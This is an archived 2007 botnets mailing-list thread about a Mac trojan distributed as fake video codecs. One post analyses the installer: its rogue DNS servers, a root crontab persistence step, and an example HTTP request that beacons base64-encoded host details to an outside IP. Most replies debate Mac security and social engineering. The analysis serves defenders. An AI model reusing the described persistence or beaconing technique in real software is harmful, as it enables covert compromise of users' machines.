Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --I've been out looking for this trojan to see if I can find it, but have had no luck so far. Has anyone here seen it? I'd like a copy to dissect. cheers åsk ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
--I've analyzed two variants of this trojan, procoded1000.dmg and
ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).
These trojans basically consist of three scripts and a browser plugin
(used by Safari / Firefox? I'm not sure.).
On the disk image:
- install.pkg/Contents/Resources/post{install,upgrade} are the same
script
- install.pkg/Contents/Resources/pre{install,upgrade} are the same script
- plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is
the same as above preinstall scripts
Only difference between two packages appears to be the dns servers:
procodec1000:
s1=85.255.116.61
s2=85.255.112.103
ultracodec1000:
s1=85.255.115.34
s2=85.255.112.158
- Preinstall scripts (and plugins.settings from Archive.pax.gz, which
is the same) sets the compromised machine's DNS to the above servers
(depending on which trojan is installed). In addition, it tries to set
a crontab for root that executes itself (as
/Library/Internet Plug-Ins/plugins.settings) once a minute.
- Postinstall scripts executes sendreq (found in Archive.pax.gz), and
then removes sendreq. sendreq sends 'mac;cpu type;hostname' as a
base64-encoded argument to the 'Accept-Language' header to
85.255.121.37.
Example:
GET / HTTP/1.1
Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg==
Host: 85.255.121.37
- Installs
/Library/Internet
Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
I'm not certain what this does. There's not much by way of suspicious
strings in this executable, and I don't have a way to safely execute it
to watch what it does.
Interesting strings (for antivirus or overly suspcious sysadmins :) ):
install.pkg/Contents/Resources/English.lproj/Description.plist:
stringIts a suppa puppa desc yo/string
In Archive.pax.gz:
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak:
Verified RoveSupa Plugin
Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE:
Verified RoveSupa Plugin
On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus:
Sure, I saved a couple copies. I'll send you a link in a second email. If
anyone else is interested in a copy, please let me know.
--
PinkFreud
Chief of Security, Nightstar IRC network
irc.nightstar.net | www.nightstar.net
Server Administrator - Blargh.CA.US.Nightstar.Net
Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature
___
To report a botnet PRIVATELY please email: [EMAIL PROTECTED]
All list and server information are public and available to law enforcement
upon request.
http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --Gadi already made the point that the significance of this lies in professional malware authors taking notice of Apple. If this trojan was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction would be the same - 'wow, the malware authors are taking notice of a new platform!'. That *is* significant, and those who are chalking that reaction up to 'anti-Apple zealotry' are sorely mistaken. There is a second point being made here, too - Apple isn't exactly known for writing bug-free code (I've already given some examples earlier in this thread), and they're not exactly known for fixing bugs until they're absolutely forced to. This is liable to create problems down the road - given that the malware authors are now starting to take notice of Macs, they'll undoubtedly try a few exploits before long. I just hope Apple has patched all known holes by then... :) On Sun, Nov 04, 2007 at 12:51:29PM -0800, Kyle Lutze babbled thus: What makes me unhappy is that people are using an SE exploit as a way to say here's proof that a mac is as insecure as a windows box or gadi saying the itw barrier has been broken for apple (read above about requirements for itw status). -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome. signature.asc Description: Digital signature ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- PinkFreud wrote: Gadi already made the point that the significance of this lies in professional malware authors taking notice of Apple. If this trojan was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction would be the same - 'wow, the malware authors are taking notice of a new platform!'. That *is* significant, and those who are chalking that reaction up to 'anti-Apple zealotry' are sorely mistaken. fair enough, both your points there are quite valid and I wasn't denying the significance of malware authors taking notice to apple, just that this being considered in the wild is a bit overboard. There is a second point being made here, too - Apple isn't exactly known for writing bug-free code (I've already given some examples earlier in this thread), and they're not exactly known for fixing bugs until they're absolutely forced to. This is liable to create problems down the road - given that the malware authors are now starting to take notice of Macs, they'll undoubtedly try a few exploits before long. I just hope Apple has patched all known holes by then... :) My point is, where's the bug in apple's code here? There's nothing apple can do about human stupidity in ignoring all of the message boxes before this trojan can be installed. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --You are beating a dead horse here. The point of this whole thing was to say that HEY, they are targeting a new platform other than windows. Not that it requires user interaction to install it. Honestly, think about it... this is how a bunch of the early malware was installed on the windows platform. By USER interaction... wanting to go to a porn site and needing xyz dialer to look at the pretty pictures. The other point is that mac users have a false sense of security... Honestly, how many mac users run AV? I know I don't on my iBook... The point about windows being less secure than osx is true(i agree with it), but in another sense it doesnt matter. If someone isn't patching they are both insecure. I am not a windows fanboy by any means, but the argument of OSX is more secure than Windows in my mind isn't a good point. I honestly don't care what is more secure out of the box... It is my job to keep things secure no matter what os or version is on them. If there is a remote exploit that can get me root on an unpatched osx(like there have been many security updates that fix), and I can get the same type of privs on an unpatched windows box then they are both Insecure. Default setups honestly on windows have gotten much better that in prior years. However we aren't here to talk about windows versus linux versus mac. On Nov 4, 2007 2:15 PM, Kyle Lutze [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- PinkFreud wrote: Gadi already made the point that the significance of this lies in professional malware authors taking notice of Apple. If this trojan was written for, say, NetBSD, or perhaps ReactOS, I know *my* reaction would be the same - 'wow, the malware authors are taking notice of a new platform!'. That *is* significant, and those who are chalking that reaction up to 'anti-Apple zealotry' are sorely mistaken. fair enough, both your points there are quite valid and I wasn't denying the significance of malware authors taking notice to apple, just that this being considered in the wild is a bit overboard. There is a second point being made here, too - Apple isn't exactly known for writing bug-free code (I've already given some examples earlier in this thread), and they're not exactly known for fixing bugs until they're absolutely forced to. This is liable to create problems down the road - given that the malware authors are now starting to take notice of Macs, they'll undoubtedly try a few exploits before long. I just hope Apple has patched all known holes by then... :) My point is, where's the bug in apple's code here? There's nothing apple can do about human stupidity in ignoring all of the message boxes before this trojan can be installed. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets -- James Pleger p: 623.298.7966 e: [EMAIL PROTECTED] ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- James Pleger wrote: You are beating a dead horse here. yeah, I just noticed while going through more e-mails that there is another thread where this topic was being beaten. Not much more need for discussion on this trojan then I guess. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --On 11/4/07, Kyle Lutze [EMAIL PROTECTED] wrote: What makes me unhappy is that people are using an SE exploit as a way to say here's proof that a mac is as insecure as a windows box or gadi saying the itw barrier has been broken for apple (read above about requirements for itw status). No computer is 100% secure, but with a default setup of windows vs. mac a mac is still more secure. if they were to write this trojan for a windows box they wouldn't have to worry about requiring superuser authentication on the majority of systems as by default your account is an administrator account on windows and not many end users change that, or they could just take advantage of any of the multitude of vulnerabilities available on windows boxes directly connected to the internet to install it automatically without even having to attach it as a fake video codec to a porn video. From my personal POV here, I think it best to break this down the the simplest terms. If we want to assume that Risk = Threat x Vulnerability, then the issue here is not Vulnerability. I think everyone here agrees that the Vulnerability being exploited in this situation is the user. However, Threat has just increased. And with this increase in threat, the risk that automated vulnerabilities will be exploited in the future has now increased. My point is nothing more then being ignored does not make you more secure. Bully for Apple that they are no longer ignored. -- Jim O'Gorman [EMAIL PROTECTED] http://www.elwood.net ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- At 9:35 AM -0500 11/3/07, Dave Ellingsberg wrote: This is not so much a SE issue as it is a pure of heart issue. For way too long the Mac has been invincible, I can click on anything, you can not hurt me! This adds to the newbie issue as those buying into the gullible mac attitude are invincible! So it adds to the End-Loser problem. Now we see a shift in targeting and lo the invincible are to be subjected to the Kryptonite of the Internet underworld. And without the antibodies of common sense that those of us who have prowled the gutters of the mighty M$. There is no way to wake up those who have come to slurp up the invincible theme anymore than you can change that attitude of those who think M$ is better because it is a GUI interface to servers an therefore anyone can do it safe and secure [well I have not heard those last two things come up when it time to switch!]. Most on this list have years of experience supporting groups of the above, in all 4 categories. We are called on to clean up the messes after the clickers and planners. We are all reactive in one way or another. Keep thinking about it, ProActive is really not attainable, but its a good goal! bigfoot. Dave, I know there are some Mac users that think and act like that. However, I think some of the nanny nanny do do attitudes toward Windows is just like kids in the school yard. I actually believe that more Windows users believe that Mac users feel and act that way than Mac users do. I know many current Mac users and most are unlike your characterizations (and unlike my mother who does not have admin access). Most are happy that the Mac (like its underpinnings of BSD Unix) comes out of the box with ports closed and root not even enabled. Most don't operate day to day as admin. In my experience, most are more careful and diligent than your average PC user on clicking on unknown links and operating their machines in general. Both your data and mine are anecdotal but I'm willing to bet that some university person on this list can do a study and prove one of us wrong. ;-) However, I still have not been provided with a compelling argument that out of the box Windows is in security even equal to Mac or Solaris or Linux. That might be part of the issue. I hope we can get away from this Windows/Mac/Unix/Solaris/Linux whose perceived to be safer and get back to real issues like whats the vector and how we all can mitigate/manage it. Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 3 Nov 2007 13:54:44 -0400, Mr. X [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Dude, you gotta get over yourself. The fact that the mac os x operating system has no viruses is not the fault of the user base. And the tirades of the told-you-so's are petty and so OT let's just get back to info on botnets. Anyone targeting the Mac or Linux base is I agree they are OT but technically isn't this entire thread, regardless of the view point? AFAIK there is not presently any botnet associated with this mac trojan or any variants of it as this time. There's definitely potential but no connection, otherwise we could be discussing any piece of malware on this list. clearly doing it not to add bots (doesnt even make sense numbers wise) but for exactly this response, seeing their handiwork talked about ad- nauseum on CNN and with the shoe banging security websites and slashdot windows users smugly yelling I was right! Sorry, but enough is enough gang. D On Nov 3, 2007, at 10:35 AM, Dave Ellingsberg [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is not so much a SE issue as it is a pure of heart issue. For way too long the Mac has been invincible, I can click on anything, you can not hurt me! This adds to the newbie issue as those buying into the gullible mac attitude are invincible! So it adds to the End-Loser problem. Now we see a shift in targeting and lo the invincible are to be subjected to the Kryptonite of the Internet underworld. And without the antibodies of common sense that those of us who have prowled the gutters of the mighty M$. There is no way to wake up those who have come to slurp up the invincible theme anymore than you can change that attitude of those who think M$ is better because it is a GUI interface to servers an therefore anyone can do it safe and secure [well I have not heard those last two things come up when it time to switch!]. Most on this list have years of experience supporting groups of the above, in all 4 categories. We are called on to clean up the messes after the clickers and planners. We are all reactive in one way or another. Keep thinking about it, ProActive is really not attainable, but its a good goal! bigfoot. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sun, 4 Nov 2007, Steven Adair wrote: On Sat, 3 Nov 2007 13:54:44 -0400, Mr. X [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Dude, you gotta get over yourself. The fact that the mac os x operating system has no viruses is not the fault of the user base. And the tirades of the told-you-so's are petty and so OT let's just get back to info on botnets. Anyone targeting the Mac or Linux base is I agree they are OT but technically isn't this entire thread, regardless of the view point? AFAIK there is not presently any botnet associated with this mac trojan or any variants of it as this time. There's definitely potential but no connection, otherwise we could be discussing any piece of malware on this list. It's a trojan horse. It hijacxks DNS and pwns people. Obviously there is a second stage of infection. What do you think it is we do here? ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- (Sorry on Digest) Hey all give it a break. You want to discuss this/ make a big deal about it then categorize it as a social engineering issue that occurs against not only any software platform but in most real life scams as well. I know many like to hype any issue against the OSX platform. To a certain degree this may indicate the increased targeting of OSX but it is interesting that the increased activity argument never seems to rise when the odd linux or unix social engineering exploit surfaces. Perhaps because none of us really know why an exploit was released or maybe because not a statistic does an isolated one off make? A single instance every now and again does not necessarily indicate a shift in targeting. Nor does a social engineering exploit attempt make a hype-able attack against OSX. Seems like much ado... Now if everyone would change focus and help come up with aids to minimize the effectiveness of social engineering attacks (esp against neophyte and residential users) that would be something to write about. Just my 2 cents, Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Sat, 3 Nov 2007, Tom wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- (Sorry on Digest) Hey all give it a break. You want to discuss this/ make a big deal about it then categorize it as a social engineering issue that occurs against not only any software platform but in most real life scams as well. I know many like to hype any issue against the OSX platform. To a certain degree this may indicate the increased targeting of OSX but it is interesting that the increased activity argument never seems to rise when the odd linux or unix social engineering exploit surfaces. Perhaps because none of us really know why an exploit was released or maybe because not a statistic does an isolated one off make? A single instance every now and again does not necessarily indicate a shift in targeting. Nor does a social engineering exploit attempt make a hype-able attack against OSX. Talk to you in 2 years. Seems like much ado... Now if everyone would change focus and help come up with aids to minimize the effectiveness of social engineering attacks (esp against neophyte and residential users) that would be something to write about. Just my 2 cents, Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- At 8:50 AM -0500 11/3/07, Gadi Evron wrote: On Sat, 3 Nov 2007, Tom wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- (Sorry on Digest) Hey all give it a break. You want to discuss this/ make a big deal about it then categorize it as a social engineering issue that occurs against not only any software platform but in most real life scams as well. I know many like to hype any issue against the OSX platform. To a certain degree this may indicate the increased targeting of OSX but it is interesting that the increased activity argument never seems to rise when the odd linux or unix social engineering exploit surfaces. Perhaps because none of us really know why an exploit was released or maybe because not a statistic does an isolated one off make? A single instance every now and again does not necessarily indicate a shift in targeting. Nor does a social engineering exploit attempt make a hype-able attack against OSX. Talk to you in 2 years. Gadi, You missed my point. I don't doubt that there will be increases in targeting OSX or any other OS. In fact, I am surprised that there aren't a slew of cross-os kits out by now as many of the current server attacks are OS agnostic. What I was wanted to focus on what that social engineering is not just an OSX problem. Its a cross environment problem (including both cyber and real worlds) and more focus should be given to that and its mitegations. Tom ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is not so much a SE issue as it is a pure of heart issue. For way too long the Mac has been invincible, I can click on anything, you can not hurt me! This adds to the newbie issue as those buying into the gullible mac attitude are invincible! So it adds to the End-Loser problem. Now we see a shift in targeting and lo the invincible are to be subjected to the Kryptonite of the Internet underworld. And without the antibodies of common sense that those of us who have prowled the gutters of the mighty M$. There is no way to wake up those who have come to slurp up the invincible theme anymore than you can change that attitude of those who think M$ is better because it is a GUI interface to servers an therefore anyone can do it safe and secure [well I have not heard those last two things come up when it time to switch!]. Most on this list have years of experience supporting groups of the above, in all 4 categories. We are called on to clean up the messes after the clickers and planners. We are all reactive in one way or another. Keep thinking about it, ProActive is really not attainable, but its a good goal! bigfoot. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Dude, you gotta get over yourself. The fact that the mac os x operating system has no viruses is not the fault of the user base. And the tirades of the told-you-so's are petty and so OT let's just get back to info on botnets. Anyone targeting the Mac or Linux base is clearly doing it not to add bots (doesnt even make sense numbers wise) but for exactly this response, seeing their handiwork talked about ad- nauseum on CNN and with the shoe banging security websites and slashdot windows users smugly yelling I was right! Sorry, but enough is enough gang. D On Nov 3, 2007, at 10:35 AM, Dave Ellingsberg [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is not so much a SE issue as it is a pure of heart issue. For way too long the Mac has been invincible, I can click on anything, you can not hurt me! This adds to the newbie issue as those buying into the gullible mac attitude are invincible! So it adds to the End-Loser problem. Now we see a shift in targeting and lo the invincible are to be subjected to the Kryptonite of the Internet underworld. And without the antibodies of common sense that those of us who have prowled the gutters of the mighty M$. There is no way to wake up those who have come to slurp up the invincible theme anymore than you can change that attitude of those who think M$ is better because it is a GUI interface to servers an therefore anyone can do it safe and secure [well I have not heard those last two things come up when it time to switch!]. Most on this list have years of experience supporting groups of the above, in all 4 categories. We are called on to clean up the messes after the clickers and planners. We are all reactive in one way or another. Keep thinking about it, ProActive is really not attainable, but its a good goal! bigfoot. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --On 11/3/07, Gadi Evron [EMAIL PROTECTED] wrote: You really think a criminal group with revenue goals targets the mac to make some mac users feel unhappy? What is amusing about this whole situation is the Mac Defender attitude that rises up when ever it comes out Apple is not perfect. This happened a while back with the wireless issues and now is coming out again. Gadi is 100% right, these people are not doing this for fun or bragging rights. This is a potential market opportunity that has been ignored up to this point. Macs up to this point have not been the target of malware attacks, and as such you have this ever growing audience of fresh faced innocent babes that have not experienced the harsh reality that users on windows based systems have been living with. A lot like some city boys driving out to some rural area where people don't lock their doors for some easy pickings. So why not throw out a couple trojans like this and see how many systems they pick up? Then see what the total ROI was. Decide at that point if it is worth doing more. If nothing else, it starts to refine the attacks so when Macs are more pervasive the attackers have a plan of attack. That day is coming if you believe the reports about 40% of college users on Macs. ( http://www.dailyprincetonian.com/archives/2007/10/05/news/18871.shtml 40 percent of Princeton students and faculty use Macs as their personal computers.) Honestly, I thought most Mac folk would see this as a good thing, it shows the Mac has become enough of a player on the market to be worth attacking. On the other hand, if you ran out to the Mac suburb to get away from all the bad crap happening in the Windows neighborhood, it might be time to move further out... Ubuntu just came out with a new release, Cory Doctorow has moved from the mac to ubuntu ( http://www.boingboing.net/2006/06/29/mark-pilgrims-list-o.html) so it must be the next hip thing to do. White flight everyone, all the cool kids are doing it. -- Jim ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Hey, Mac's just work! Right? It's going to get ugly. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] --Hi Gadi, I think you've gone a bit over the top here. I use Macs in preference to Windows because it reduces my system administration demands to tiny levels. I can focus on my business, not a blizzard of meaningless messages, a welter of updates requiring reboots, and bizarre, partially documented application crashes, reboots, infections, reinstallations, Windows Genuine Annoyance, etc. InfoSec is there to make sure that I can run my business, not as an end in itself. It *prevents* profit making activity by having effort expended on internal needs. So if the Mac hasn't *needed* higher level of security hoops, previously, that's good. So long as weaknesses are fixed *when needed*, I'm a happy bunny. If there's a Day Zero attack that hits a Mac, I'll be disappointed, but it's not a uniquely Mac situation to be in... If the failure was an obvious weakness, I'm actually still pretty sanguine, because it hasn't yet been exploited, despite being well known. However, *this* codec installation tease is a social engineering attack. It isn't exploiting a Mac vulnerability. It doesn't do privilige escalation, but relies on an authorised user to do something foolish. That can happen on any OS. The main defence against this kind of attack on a secure OS, is that the user is aware of the problems involved in changing security levels. Practically, what defence *could* have been offered on Macs to defend against *this* attack? An active AV system with a signature file? I think that's about it. Certainly not any scary story of DNS or other as yet unexpolited vulnerabilities. This isn't a virally propagated, privilege escalating infection. I remain an unflustered Mac user, but I will be reminding my colleagues that they shouldn't install software that they don't trust. In a couple of cases, I may revoke system admin privileges, where I think that certain users don't have enough technical knowledge to assess the threat. So... important, but not yet scary and not yet enough to make me concerned that I should be switching to another OS, or seriously concerned by Mac vulnerabilities. And this has, so far, little to do with botnets... Unless this SE attack is installing a bot. Is it? What does the bot do? Is there a signature? That'd be interesting :) Cheers, JeremyC. -- Jeremy Chatfield ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Thu, 1 Nov 2007, Jeremy Chatfield wrote: snip correct stuff And this has, so far, little to do with botnets... Unless this SE attack is installing a bot. Is it? What does the bot do? Is there a signature? That'd be interesting :) Social engineering or vulnerabilities, the web is much of how bots propagate these days. A trojan horse == bot. That's how we used to call them. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 31 Oct 2007, Joel Esler wrote: Um. Not only do you have to purposefully go download it, agree to accept the download, them agree to give the software admin priviledges. That's 3 accept dialogues and a password type in. Hardly malware. Not different from many Windows cases. Only Apple has a long history of unpatched vulnerabilities to cope with. The Widnows 98 eco-system is about to be re-created now that the itw barrier has been broken for Apple. Gadi. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is the dns thing right? -- Joel Esler Sent from the road. On Oct 31, 2007, at 10:06 PM, Gadi Evron [EMAIL PROTECTED] wrote: On Wed, 31 Oct 2007, Joel Esler wrote: Btw, not only is this the third peice of malware in the past year or so, bit its just like those as well. You have to click at least 2 accept dialogues, be coaxed to download it. But them you have to type in your admin password. How is this automated malware again? Or am I not thinking about the right peice of code? I think we are talking of different thing, Joel. -- Joel Esler Sent from the road. On Oct 31, 2007, at 7:25 PM, Gadi Evron [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target macs. http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind. I can sum it up in one sentence: OS X is the new Windows 98. Investing in security ONLY as a last resort losses money, but everyone has to learn it for themselves. Gadi Evron. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- This is an SE type of malware. Codecs require installation so it needs root/admin privileges. On 11/1/07, Joel Esler [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Btw, not only is this the third peice of malware in the past year or so, bit its just like those as well. You have to click at least 2 accept dialogues, be coaxed to download it. But them you have to type in your admin password. How is this automated malware again? Or am I not thinking about the right peice of code? -- Joel Esler Sent from the road. On Oct 31, 2007, at 7:25 PM, Gadi Evron [EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- For whoever didn't hear, there is a Macintosh trojan in-the-wild being dropped, infecting mac users. Yes, it is being done by a regular online gang--itw--it is not yet another proof of concept. The same gang infects Windows machines as well, just that now they also target macs. http://sunbeltblog.blogspot.com/2007/10/screenshot-of-new-mac-trojan.html http://sunbeltblog.blogspot.com/2007/10/mackanapes-can-now-can-feel-pain-of.html This means one thing: Apple's day has finally come and Apple users are going to get hit hard. All those unpatched vulnerabilities from years past are going to bite them in the behind. I can sum it up in one sentence: OS X is the new Windows 98. Investing in security ONLY as a last resort losses money, but everyone has to learn it for themselves. Gadi Evron. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Yap. Social Engineering type of program is hard to deal with. I dont see this as big as the subject would like it to be. mac trojan in-the-wild. 'Wild' imho means out of control. SE program requires many clicks. To tame it even more, by default, on the mac, unlike windows, one needs to enter administrator password to activate this type of program. Hidden network activities are also tame even more in Leopard.(v.10.5) Hanz On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote: This is an SE type of malware. Codecs require installation so it needs root/admin privileges. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- but what if a user configured osx so that the administrator password does not need to be entered each time? Gadi Evron mailto:[EMAIL PROTECTED] wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- On Wed, 31 Oct 2007, Hanz Makmur wrote: To report a botnet PRIVATELY please email: [EMAIL PROTECTED] -- Yap. Social Engineering type of program is hard to deal with. I dont see this as big as the subject would like it to be. mac trojan in-the-wild. 'Wild' imho means out of control. SE program requires many clicks. To tame it even more, by default, on the mac, unlike windows, one needs to enter administrator password to activate this type of program. Hidden network activities are also tame even more in Leopard.(v.10.5) in-the-wild in this context means what it means for years now in our realm: Currently actively exploited. Hanz On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote: This is an SE type of malware. Codecs require installation so it needs root/admin privileges. ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets ___ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets
Re: [botnets] mac trojan in-the-wild
